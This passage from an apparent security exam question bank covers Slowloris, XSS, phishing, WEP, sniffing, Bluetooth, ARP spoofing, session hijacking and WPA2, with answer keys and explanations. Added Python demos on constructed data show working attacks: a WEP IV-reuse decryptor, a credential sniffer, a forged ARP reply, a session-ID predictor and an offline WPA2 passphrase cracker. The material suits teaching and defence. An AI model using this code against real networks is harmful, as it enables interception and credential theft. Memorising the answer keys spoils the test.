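    """After a SYN/ACK a half-open scanner sends RST, never the ACK that would complete the handshake."""
    r = parse_segment(reply)
    if r["flags"] & SYN and r["flags"] & ACK:
        return build_segment(src_ip, dst_ip, r["dport"], r["sport"], RST, seq=r["ack"])
    return None


if __name__ == "__main__":
    me, target = "10.0.0.5", "10.0.0.9"            # constructed addresses
    probe = build_segment(me, target, 40000, 443, SYN, seq=1000)
    print("probe flags:", hex(parse_segment(probe)["flags"]), "checksum ok:", checksum_ok(me, target, probe))
    synack = build_segment(target, me, 443, 40000, SYN | ACK, seq=555, ack=1001)
    print("SYN/ACK ->", classify("syn", synack), "| scanner answers with flags",
          hex(parse_segment(scanner_followup(synack, me, target))["flags"]))
    print("RST     ->", classify("syn", build_segment(target, me, 443, 40000, RST | ACK, ack=1001)))
    print("silence ->", classify("syn", None), "| for a null scan:", classify("null", None))
```

The follow-up RST carries the target's acknowledged sequence number so the target's half-open entry is released immediately; a full connect scan would instead send the ACK, complete the handshake, and show up in the application's logs.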

Question 111

Which attack involves overwhelming a web server by holding many HTTP connections open simultaneously?

A) Slowloris attack
B) SYN flood
C) UDP flood
D) Ping of Death

Answer: A) Slowloris attack

Explanation:

The Slowloris attack is an application-layer denial-of-service technique that exhausts a web server's pool of concurrent connections by opening many HTTP sessions and keeping each one alive for as long as possible. Instead of sending complete requests, the attacker sends partial HTTP headers at slow intervals, just often enough to stop the server from timing the connection out and freeing its resources. Because thread- or process-per-connection servers, such as Apache in its prefork configuration, dedicate a worker to each open connection, Slowloris gradually consumes every available worker, and legitimate clients can no longer establish sessions even though the server's bandwidth and CPU are barely used. That low traffic volume is the attack's main strength: it can be launched from a single host and is easy to miss in bandwidth-based monitoring. Mitigations include enforcing header and body read timeouts (Apache's mod_reqtimeout), limiting connections per source address, placing an event-driven reverse proxy such as nginx in front of the origin, and using servers whose connection handling is asynchronous rather than one worker per connection.

SYN flood, listed as option B, is also a denial-of-service attack but operates at the transport layer. Attackers send numerous SYN packets to initiate TCP handshakes but never complete them, leaving the server with a backlog of half-open connections. This consumes resources but does not use slow or incomplete HTTP requests like Slowloris does.

UDP flood, option C, overwhelms the target by sending massive volumes of UDP packets to random ports. The aim is to saturate bandwidth or force the server to issue unreachable replies. This is a volumetric network-layer method, not an application-layer slow-request attack.

Ping of Death, option D, sends malformed or oversized ICMP packets that exceed maximum IP packet sizes. This historically caused buffer overflows or crashes on vulnerable systems. It does not involve connection exhaustion or manipulating HTTP headers.

The correct answer is Slowloris attack because it uniquely targets web servers by intentionally holding multiple HTTP connections open with incomplete requests, a behavior not shared by SYN flood, UDP flood, or Ping of Death.

Question 112

Which technique allows attackers to steal sensitive information from a browser session using malicious scripts?

A) Cross-site scripting
B) SQL injection
C) Man-in-the-middle attack
D) Directory traversal

Answer: A) Cross-site scripting

Explanation: 

Cross-site scripting, or XSS, is an attack where malicious scripts—typically JavaScript—are injected into otherwise trusted web pages and executed by a victim’s browser. The key strength of XSS is that it allows an attacker to run unauthorized code within the security context of a website the victim is visiting, enabling theft of cookies, session identifiers, authentication tokens, personal data, or browsing information. XSS occurs when an application improperly validates or sanitizes user input before rendering it. Attackers exploit this by embedding harmful scripts in fields like search boxes, comment sections, or URLs. When another user loads the affected page, the malicious script executes automatically. XSS appears in multiple forms: stored XSS persists on the server and affects anyone who visits the corrupted page; reflected XSS returns the malicious code through immediate responses such as search results; and DOM-based XSS manipulates client-side scripts and the Document Object Model without requiring changes to server-side output. Preventing XSS requires output encoding, proper input handling, use of Content Security Policy, secure cookie flags, and frameworks with built-in sanitization.

SQL injection, option B, targets server-side databases by manipulating SQL queries. It does not involve executing malicious scripts on a victim’s browser or stealing session data through script injection.

A man-in-the-middle attack, option C, can intercept or alter traffic between two communicating parties. While capable of stealing information in transit, it does not rely on injecting scripts that execute within the browser environment.

Directory traversal, option D, attempts to access restricted files by exploiting improper path validation. It impacts file systems rather than browser sessions and does not involve script execution within web pages.

The correct answer is cross-site scripting because it uniquely involves the execution of attacker-supplied scripts in a user’s browser—behavior not exhibited by SQL injection, MITM, or directory traversal.

Question 113

Which attack involves tricking users into revealing sensitive information through fraudulent emails?

A) Phishing
B) Vishing
C) Smishing
D) Shoulder surfing

Answer: A) Phishing

Explanation: 

Phishing is a widespread and persistent form of social engineering in which attackers craft fraudulent emails that mimic legitimate organizations, institutions, or individuals to deceive recipients into revealing sensitive data. These emails often imitate branding, formatting, tone, and URL structures to appear authentic. Attackers may prompt users to click on malicious links leading to fake login portals, download harmful attachments, or respond with confidential information such as usernames, passwords, financial details, or personal identification data. Phishing campaigns may be broad and generic or highly targeted, such as spear-phishing, where attackers tailor messages to specific individuals using personalized details. Business email compromise is another variation in which attackers pose as executives or vendors to request unauthorized transfers. Preventing phishing requires a combination of user awareness, email filtering solutions, DNS-based authentication controls such as SPF, DKIM, and DMARC, and practices like multi-factor authentication to limit the damage from stolen credentials.

Vishing, option B, is similar in psychological intent but uses voice calls instead of email. Attackers impersonate banks, support centers, or government agencies to manipulate victims into providing sensitive data over the phone.

Smishing, option C, uses SMS messages to lure victims into clicking malicious links or sharing private information. It is mobile-oriented and text-based, not email-based.

Shoulder surfing, option D, relies on physical observation. Attackers visually capture sensitive information like PINs, passwords, or screen contents, which does not involve digital deception or fraudulent messages.

The correct answer is phishing because it specifically uses fraudulent emails to mislead recipients, whereas vishing, smishing, and shoulder surfing operate through entirely different communication channels and methods.

Question 114

Which attack exploits weaknesses in the WEP protocol to recover encryption keys?

A) WEP cracking
B) WPA2 cracking
C) Evil twin attack
D) Bluejacking

Answer: A) WEP cracking

Explanation: 

WEP cracking targets weaknesses in the WEP encryption protocol for Wi-Fi networks. WEP encrypts each frame with RC4 keyed by a 24-bit initialization vector (IV) concatenated with the shared secret key; the IV is transmitted in cleartext, the IV space is so small that a busy network repeats IVs within minutes, and certain IV values interact with RC4's key scheduling to leak bytes of the key. Attackers capture frames, collect IVs (often injecting ARP requests to generate traffic faster), and recover the shared key statistically with the FMS/KoreK or PTW attacks; tools like Aircrack-ng automate the process and typically need tens of thousands of captured frames. Because WEP has no per-session key management, the recovered key gives full access to the network and to every previously captured frame. WEP cracking demonstrates the weaknesses of obsolete encryption and why WPA2 or WPA3 is required.

WPA2 cracking targets modern encryption that uses AES-CCMP with per-session keys. The practical attack is offline: the attacker captures the four-way handshake (or a PMKID) and runs dictionary or brute-force guesses against the pre-shared key. There is no IV analysis, and a long random passphrase defeats it.

Evil twin attacks involve creating rogue access points to trick clients into connecting. While often paired with credential theft, it does not exploit WEP encryption weaknesses.

Bluejacking sends unsolicited messages to nearby Bluetooth devices. It is unrelated to Wi-Fi encryption or key recovery.

The correct answer is WEP cracking because it specifically exploits weak initialization vectors in WEP to recover keys. WPA2 cracking, evil twin, and bluejacking involve different techniques, targets, or technologies.
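The IV weakness demonstrated in code, as an added example that is not from the exam page. It implements RC4 and the WEP frame layout (24-bit IV, key id, RC4 over payload plus CRC-32 ICV) from the standard library and shows two things: that frames encrypted under a repeated IV share a keystream, so the fixed LLC/SNAP header at the start of every data frame lets an attacker decrypt another frame without the key, and how quickly a 24-bit IV space produces such a repeat. Key, IV and payloads are constructed. The statistical key-recovery attacks (FMS/KoreK, PTW) that Aircrack-ng implements build on these properties and are not reproduced here.

```python
"""WEP: RC4 keystream reuse under a repeated IV, and the IV birthday bound (added example)."""
import math
import zlib

LLC_SNAP_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"   # known plaintext: start of every IPv4 data frame


def rc4_keystream(key: bytes, length: int) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):                              # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):                           # pseudo-random generation algorithm (PRGA)
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, wep_key: bytes, payload: bytes) -> bytes:
    """Frame body = IV(3) || key-id(1) || RC4_{IV||key}(payload || CRC-32 ICV)."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    return iv + b"\x00" + _xor(body, rc4_keystream(iv + wep_key, len(body)))


def wep_decrypt(frame: bytes, wep_key: bytes) -> bytes:
    iv, ct = frame[:3], frame[4:]
    body = _xor(ct, rc4_keystream(iv + wep_key, len(ct)))
    payload, icv = body[:-4], body[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


def recover_from_iv_reuse(frame_known: bytes, known_plaintext: bytes, frame_target: bytes) -> bytes:
    """No key needed: when the IV repeats, C1 ^ C2 = P1 ^ P2, so known P1 yields P2."""
    if frame_known[:3] != frame_target[:3]:
        raise ValueError("frames use different IVs; their keystreams differ")
    keystream = _xor(frame_known[4:], known_plaintext)       # recovered keystream prefix
    return _xor(frame_target[4:4 + len(keystream)], keystream)


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `frames` random IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * 2 ** iv_bits))


if __name__ == "__main__":
    key, iv = b"\xde\xad\xbe\xef\x01", b"\x01\x02\x03"          # constructed 40-bit key and IV
    f1 = wep_encrypt(iv, key, LLC_SNAP_IP + b"frame one payload")
    f2 = wep_encrypt(iv, key, LLC_SNAP_IP + b"frame two: secret")
    print("decrypted with key  :", wep_decrypt(f2, key))
    print("recovered without it:", recover_from_iv_reuse(f1, LLC_SNAP_IP + b"frame one payload", f2))
    for n in (1000, 5000, 12000):
        print(f"{n:6d} frames -> P(IV repeat) = {iv_collision_probability(n):.3f}")
```

With only the eight-byte LLC/SNAP header as known plaintext the attacker still learns the first eight bytes of keystream for that IV, which is enough to forge or decrypt the start of any other frame sent under it; around 5,000 frames, a few seconds of traffic on a busy network, give better-than-even odds of a repeated IV.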

Question 115

Which attack captures traffic on a local network to analyze sensitive information?

A) Packet sniffing
B) ARP spoofing
C) SQL injection
D) Cross-site scripting

Answer: A) Packet sniffing

Explanation: 

Packet sniffing is a reconnaissance technique in which an attacker captures data packets as they traverse a network. Tools such as Wireshark and tcpdump decode protocols, headers, and payloads, and on unencrypted traffic they expose passwords, email contents, session cookies, and other sensitive data directly. Sniffing is passive and leaves no trace on the wire, but on a switched network the attacker only sees traffic addressed to their own port; observing other hosts' traffic requires a hub, a mirror (SPAN) port, or an active technique such as ARP spoofing or MAC flooding. Captured traffic often serves as the precursor to MITM attacks or credential theft, and end-to-end encryption (TLS, SSH) is the control that makes sniffed packets useless.

ARP spoofing is a technique to associate the attacker’s MAC address with a legitimate IP, enabling MITM attacks. While it may lead to sniffing opportunities, ARP spoofing is an active attack, unlike passive sniffing.

SQL injection targets database-driven applications to manipulate queries and retrieve data. It is application-level exploitation, unrelated to network packet capture.

Cross-site scripting injects scripts into web pages to execute in victim browsers, targeting client-side security rather than network-level traffic.

The correct answer is packet sniffing because it uniquely involves capturing network traffic for analysis. ARP spoofing may enable sniffing, but packet sniffing itself is the primary tool for analyzing sensitive information directly.
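What a sniffer does with a captured frame, as an added example that is not code from the exam page: decode Ethernet, IPv4 and TCP headers and pull an HTTP Basic Authorization credential out of the cleartext payload. The frame is constructed in build_sample_frame() so the script runs offline; in practice the same bytes come from a pcap file or a raw socket.

```python
"""Passive inspection: parse Ethernet/IPv4/TCP and extract HTTP Basic credentials (added example)."""
import base64
import struct
from typing import Optional


def build_sample_frame() -> bytes:
    """Constructed: 192.0.2.10:51234 -> 198.51.100.7:80 carrying a cleartext request with Basic auth."""
    http = (b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
            b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n\r\n")
    tcp = struct.pack("!HHIIBBHHH", 51234, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0)   # PSH|ACK; checksum left 0
    total_len = 20 + len(tcp) + len(http)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0x4000, 64, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([198, 51, 100, 7]))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    return eth + ip + tcp + http


def parse_frame(frame: bytes) -> dict:
    """Decode Ethernet -> IPv4 -> TCP and return addresses, ports, flags and the TCP payload."""
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != 0x0800:
        raise ValueError("not IPv4")
    ip = frame[14:]
    vihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (vihl & 0x0F) * 4                         # IPv4 options lengthen the header
    if proto != 6:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]                         # trust total_len, not the frame length (padding)
    sport, dport, _seq, _ack, off, flags = struct.unpack("!HHIIBB", tcp[:14])
    data_off = (off >> 4) * 4                       # TCP options lengthen the header too
    return {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)),
            "sport": sport, "dport": dport, "flags": flags, "payload": tcp[data_off:]}


def extract_basic_auth(payload: bytes) -> Optional[str]:
    """Return 'user:password' if the payload carries an HTTP Basic Authorization header."""
    for line in payload.split(b"\r\n"):
        if line.lower().startswith(b"authorization: basic "):
            return base64.b64decode(line.split(b" ", 2)[2]).decode(errors="replace")
    return None


def sniff(frames) -> list:
    """Run over captured frames and report credentials seen in cleartext HTTP."""
    found = []
    for frame in frames:
        try:
            pkt = parse_frame(frame)
        except (ValueError, struct.error):
            continue                                # non-IPv4, non-TCP or truncated frame
        creds = extract_basic_auth(pkt["payload"])
        if creds:
            found.append((pkt["src"], pkt["dst"], pkt["dport"], creds))
    return found


if __name__ == "__main__":
    for src, dst, port, creds in sniff([build_sample_frame()]):
        print(f"{src} -> {dst}:{port}  Basic auth = {creds}")
```

Basic authentication is just base64, not encryption, which is why it is readable here; over HTTPS the TCP payload would be TLS records and the same parser would find nothing.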

Question 116

Which attack uses unsolicited Bluetooth messages to nearby devices?

A) Bluejacking
B) Bluesnarfing
C) BlueBump
D) BlueBugging

Answer: A) Bluejacking

Explanation: 

Bluejacking is a Bluetooth-based technique that involves sending unsolicited messages, typically short texts or digital contact cards, to nearby discoverable devices. It originated as a harmless prank, but over time security professionals began using it as an example of how Bluetooth features can be abused to create social engineering opportunities. Bluejacking does not require pairing or authentication because the message is delivered through the OBEX Object Push Profile, the same profile used to exchange vCards, with the text placed in the contact's name field. It cannot access sensitive data, modify system settings, or compromise device integrity, and it only works while the target is discoverable and within radio range. However, it can still be used to distract users, deliver deceptive messages, or convince individuals to take specific actions, such as clicking a malicious link or engaging in communication with the attacker. Although the impact is relatively low compared to more sophisticated Bluetooth attacks, Bluejacking demonstrates how wireless communication technologies are exposed to privacy intrusions when devices remain discoverable.

Bluesnarfing, option B, is far more severe. It exploits vulnerabilities in Bluetooth implementations to gain unauthorized access to data stored on a device, such as contacts, text messages, call logs, and files. Unlike Bluejacking, Bluesnarfing directly compromises confidentiality by extracting private information without the owner’s knowledge. This makes it an actual security breach rather than an annoyance or prank.

Option C, BlueBump, manipulates Bluetooth pairing by forcing a previously paired device to re-establish trust with the attacker-controlled device. This can give the attacker extended interaction opportunities, enabling them to potentially intercept data or maintain unauthorized connections. Its operation focuses on authentication abuse, not message delivery.

Option D, BlueBugging, is one of the most advanced Bluetooth attacks. It allows an attacker to take remote control of a victim’s device by exploiting firmware vulnerabilities or misconfigurations. Once successful, attackers can make phone calls, send messages, monitor audio, or manipulate device functions. BlueBugging is a highly invasive compromise that goes beyond unsolicited communication.

Therefore, Bluejacking is the correct answer because it uniquely involves sending unsolicited Bluetooth messages to nearby devices. The other listed attacks perform unauthorized data access, takeover, or reconnection manipulation rather than simple message sending.

Question 117

Which attack manipulates ARP tables on a LAN to intercept or redirect traffic?

A) ARP spoofing
B) DNS poisoning
C) SYN flood
D) Ping of Death

Answer: A) ARP spoofing

Explanation:

ARP spoofing, also known as ARP poisoning, is a network attack in which an adversary sends forged ARP messages across a local area network. The goal is to associate the attacker’s MAC address with the IP address of another device, such as a default gateway or another host. Because ARP lacks authentication, devices accept the falsified entries and update their ARP tables, causing traffic intended for the legitimate host to be sent to the attacker instead. Once this redirection is established, the attacker can intercept, modify, or block communications. ARP spoofing is often used as a stepping stone for man-in-the-middle attacks, credential theft, session hijacking, or traffic manipulation. It highlights a fundamental weakness in the ARP protocol design: trust in unsolicited messages.

DNS poisoning, option B, operates at a different layer of networking. It manipulates DNS records so users attempting to reach legitimate websites are redirected to fraudulent servers. While effective for redirection attacks, it does not interact with ARP tables and does not control LAN-level MAC–IP associations.

Option C, SYN flood, is a denial-of-service attack that overwhelms servers by sending numerous SYN packets without completing the TCP three-way handshake. This exhausts connection tables and prevents legitimate users from accessing services. Although disruptive, it does not influence local address resolution or enable traffic interception.

Ping of Death, option D, involves sending oversized or malformed ICMP packets to exploit vulnerabilities in older systems that may crash or behave unpredictably when handling such packets. It is destructive but unrelated to ARP manipulation.

Thus, ARP spoofing is the correct answer because it specifically targets LAN-based ARP tables to intercept or redirect traffic, whereas the other attacks affect DNS, TCP handshake resources, or ICMP packet processing.
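
As an added example (not part of the original question set), the block below builds the forged ARP reply an attacker would send and a passive detector of the kind arpwatch implements: it preloads or learns IP-to-MAC bindings and alerts when an unsolicited reply claims a known IP with a different MAC. The addresses (gateway 10.0.0.1, victim 10.0.0.25, attacker MAC de:ad:be:ef:00:01) are constructed for the example.

```python
import struct


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet frame carrying an ARP reply (opcode 2). A spoofer sends this unsolicited,
    with sender_ip set to the gateway's address and sender_mac set to its own interface."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + b"\x08\x06"        # EtherType ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)                         # Ethernet/IPv4, reply
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of a frame, or None if it is not ARP."""
    if frame[12:14] != b"\x08\x06":
        return None
    arp = frame[14:]
    _htype, _ptype, _hlen, _plen, op = struct.unpack("!HHBBH", arp[:8])
    return {"op": op,
            "sender_mac": mac_str(arp[8:14]), "sender_ip": ip_str(arp[14:18]),
            "target_mac": mac_str(arp[18:24]), "target_ip": ip_str(arp[24:28])}


class ArpWatcher:
    """Passive detector: learn (or preload) IP->MAC bindings and alert when a reply changes one."""

    def __init__(self, known=None):
        self.table = dict(known or {})
        self.alerts = []

    def observe(self, frame: bytes):
        arp = parse_arp(frame)
        if arp is None or arp["op"] != 2:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        prev = self.table.get(ip)
        if prev is None:
            self.table[ip] = mac           # first sighting: learn it
            return None
        if prev != mac:
            alert = f"ARP conflict: {ip} was {prev}, now claimed by {mac}"
            self.alerts.append(alert)
            return alert
        return None


# Constructed addresses and traffic for the example.
GATEWAY_IP, GATEWAY_MAC = "10.0.0.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "10.0.0.25", "aa:bb:cc:00:00:25"
ATTACKER_MAC = "de:ad:be:ef:00:01"
LEGIT_REPLY = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
SPOOFED_REPLY = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)


def run_demo():
    """Feed a legitimate gateway reply, then the attacker's forged one, through the watcher."""
    watcher = ArpWatcher(known={GATEWAY_IP: GATEWAY_MAC})
    return [watcher.observe(LEGIT_REPLY), watcher.observe(SPOOFED_REPLY)]


if __name__ == "__main__":
    for result in run_demo():
        print(result)
```

The detector will also fire on a legitimate change (a replaced gateway NIC), so alerts need a human to confirm; the preventive controls are static ARP entries on critical hosts and Dynamic ARP Inspection on the switch, which drops replies whose sender binding does not match the DHCP snooping table.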

Question 118

Which attack targets weak session management to impersonate a legitimate user?

A) Session hijacking
B) Phishing
C) SQL injection
D) ARP spoofing

Answer: A) Session hijacking

Explanation:

Session hijacking occurs when an attacker takes over a valid session belonging to a legitimate user, typically by stealing or predicting session tokens used to authenticate ongoing interactions. These tokens may be stored in cookies, URLs, hidden fields, or request headers. When session management is poorly implemented—such as using predictable session IDs, transmitting tokens without encryption, or failing to invalidate old sessions—attackers can gain unauthorized access. Methods used to obtain tokens include packet sniffing on unencrypted networks, exploiting cross-site scripting (XSS) to exfiltrate cookies, man-in-the-middle interception, or brute-forcing weak token values. Once the attacker has the session token, they impersonate the legitimate user and access sensitive information, perform transactions, or modify account settings. This makes session hijacking one of the most serious web application security threats because it bypasses authentication entirely.

Phishing, option B, involves tricking users into voluntarily revealing personal information through deceptive emails or fake websites. While phishing can eventually result in session compromise if victims provide credentials, it is not a direct exploitation of session weaknesses.

SQL injection, option C, allows attackers to manipulate backend database queries by injecting malicious SQL statements. Although SQL injection can lead to authentication bypass or data theft, it targets server-side database logic rather than session token management.

ARP spoofing, option D, manipulates local network address mappings. While it can be used to intercept session tokens in transit, it is not inherently a session management attack.

Therefore, session hijacking is the correct answer because it directly targets weaknesses in session handling to impersonate a user.
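
The following added example (not from the original question set) shows the "predictable session ID" weakness the explanation mentions, with the attacker's prediction loop beside the correct generator. The vulnerable generator, the timestamp `1_700_000_000_000`, and the `SessionStore` oracle are constructed for the example; `is_valid` stands in for "the server accepted the cookie".

```python
import hashlib
import secrets


def weak_session_id(issued_ms: int) -> str:
    """Vulnerable pattern (constructed): the session ID is a hash of the issuance timestamp,
    so its effective entropy is only the attacker's uncertainty about when the login happened."""
    return hashlib.sha1(f"session-{issued_ms}".encode()).hexdigest()


def strong_session_id() -> str:
    """Fix: 256 bits from the OS CSPRNG; nothing about it is derivable from time or user data."""
    return secrets.token_urlsafe(32)


class SessionStore:
    """Minimal server-side session table used as the attacker's validity oracle."""

    def __init__(self):
        self.active = set()

    def issue(self, sid: str) -> str:
        self.active.add(sid)
        return sid

    def is_valid(self, sid: str) -> bool:
        return sid in self.active


def predict_weak_session_id(observed_ms: int, window_ms: int, is_valid):
    """Attacker side: the victim's login time is known to within +/- window_ms (from a Date
    header, a log line, or sniffed traffic); each candidate is replayed until one is accepted."""
    for delta in range(-window_ms, window_ms + 1):
        candidate = weak_session_id(observed_ms + delta)
        if is_valid(candidate):
            return candidate
    return None


def run_demo():
    """Victim logs in; attacker who saw the login ~0.7 s later searches a 2 s window (~4000 tries)."""
    store = SessionStore()
    login_ms = 1_700_000_000_000                      # constructed timestamp
    victim_sid = store.issue(weak_session_id(login_ms))
    hijacked = predict_weak_session_id(login_ms + 731, 1000, store.is_valid)
    return victim_sid, hijacked


if __name__ == "__main__":
    victim, hijacked = run_demo()
    print("hijacked session:", hijacked == victim)
    print("strong id:", strong_session_id())
```

A few thousand requests is trivial for an attacker, which is why session IDs must come from a CSPRNG (128 bits or more), be sent only over TLS with the `Secure` and `HttpOnly` cookie attributes, and be regenerated at login so a fixated or previously leaked value cannot be reused.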

Question 119

Which wireless attack captures WPA/WPA2 handshakes to attempt offline password cracking?

A) WPA handshake capture
B) WEP cracking
C) Evil twin attack
D) Bluejacking

Answer: A) WPA handshake capture

Explanation:

WPA handshake capture focuses on intercepting the four-way handshake that occurs whenever a client device connects or reconnects to a WPA or WPA2-PSK protected wireless network. The handshake never transmits the pre-shared key (PSK) itself; it carries the two nonces (ANonce and SNonce) and a message integrity code (MIC) computed with a key derived from the PSK, the SSID, both MAC addresses, and the nonces. Everything needed to recompute that MIC except the PSK is therefore in the capture, so an attacker who records it with a tool like Airodump-ng can test candidate passphrases offline with a dictionary, brute-force, or rule-based attack (Aircrack-ng or hashcat) and stop when a candidate reproduces the captured MIC. Since the cracking process occurs offline, there is no further interaction with the target network after the handshake is collected, reducing the chances of detection. To capture handshakes, attackers often force clients to reconnect by sending deauthentication frames, prompting them to re-initiate the handshake sequence; a related technique captures the PMKID from the first EAPOL frame and needs no connected client at all. The success of the attack depends entirely on passphrase strength, and WPA3's SAE handshake is designed so that a capture cannot be cracked offline. This makes WPA handshake capture one of the primary methods used in password-based Wi-Fi attacks against WPA/WPA2 networks today.

WEP cracking, option B, targets the obsolete WEP encryption algorithm by exploiting vulnerabilities involving weak initialization vectors and RC4 key scheduling. It does not involve WPA/WPA2 handshakes or offline PSK cracking.

Evil twin attacks, option C, involve creating rogue access points that mimic legitimate networks to trick users into connecting. While these attacks may capture credentials or force connections, they do not specifically focus on capturing WPA handshakes for password cracking.

Bluejacking, option D, deals with sending unsolicited Bluetooth messages and has no relevance to Wi-Fi authentication or WPA security.

Thus, WPA handshake capture is the correct answer because it uniquely targets WPA/WPA2 authentication frames for offline password recovery.
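
The block below is an added example, not part of the original question set, that carries the offline cracking step through in code: PMK derivation from the passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 iterations), PTK derivation with the 802.11i PRF, and MIC recomputation for each candidate passphrase. Because no real capture is available here, the "captured" MIC is generated inline from a constructed handshake (SSID `CorpWiFi`, made-up MACs and nonces, and the passphrase `summer2019` which the cracking loop does not know); in an engagement those values come from the pcap.

```python
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK mapping: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 keyed with the PMK over the label, both MACs and both nonces (each pair sorted)."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):   # 4 x 20 bytes, truncated to 64 bytes (512 bits)
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """The KCK (first 16 bytes of the PTK) authenticates the EAPOL-Key frame.
    WPA2/CCMP uses HMAC-SHA1 truncated to 128 bits; WPA/TKIP would use HMAC-MD5."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def eapol_key_frame(snonce: bytes, mic: bytes = bytes(16), key_data: bytes = b"") -> bytes:
    """Minimal EAPOL-Key frame (message 2 of 4). The MIC is computed over the whole frame
    with this MIC field zeroed, which is the form the cracker needs."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: version 2 (HMAC-SHA1/AES), pairwise, MIC set
            + b"\x00\x10"                    # key length 16 (CCMP)
            + (1).to_bytes(8, "big")         # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, key ID
            + mic + struct.pack("!H", len(key_data)) + key_data)
    return b"\x02\x03" + struct.pack("!H", len(body)) + body   # EAPOL version 2, type 3 (Key)


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Offline attack: recompute the MIC for each candidate passphrase; a match reveals the PSK."""
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# Constructed handshake standing in for a capture.
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(100, 132))
EAPOL_MSG2_ZEROED = eapol_key_frame(SNONCE)

# Simulating the capture: the MIC is produced with the true passphrase, which the cracking
# loop below never sees. With a real pcap this value is read from message 2 of the handshake.
_TRUE_PASSPHRASE = "summer2019"
CAPTURED_MIC = eapol_mic(
    ptk_from_pmk(pmk_from_passphrase(_TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16],
    EAPOL_MSG2_ZEROED)

WORDLIST = ["password", "letmein", "CorpWiFi123", "summer2019", "qwerty123"]

if __name__ == "__main__":
    print("recovered PSK:", crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE,
                                            EAPOL_MSG2_ZEROED, CAPTURED_MIC, WORDLIST))
```

The 4096-iteration PBKDF2 is the whole cost of the attack (the PTK and MIC steps are a handful of HMACs), which is why the SSID acts as a salt against precomputed tables and why a long random passphrase, rather than the protocol, is what makes a WPA2-PSK network resistant to this.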

Question 120

Which attack exploits misconfigured network devices to retrieve sensitive routing information?

A) SNMP enumeration
B) SYN flood
C) DNS amplification
D) Slowloris attack

Answer: A) SNMP enumeration

Explanation:

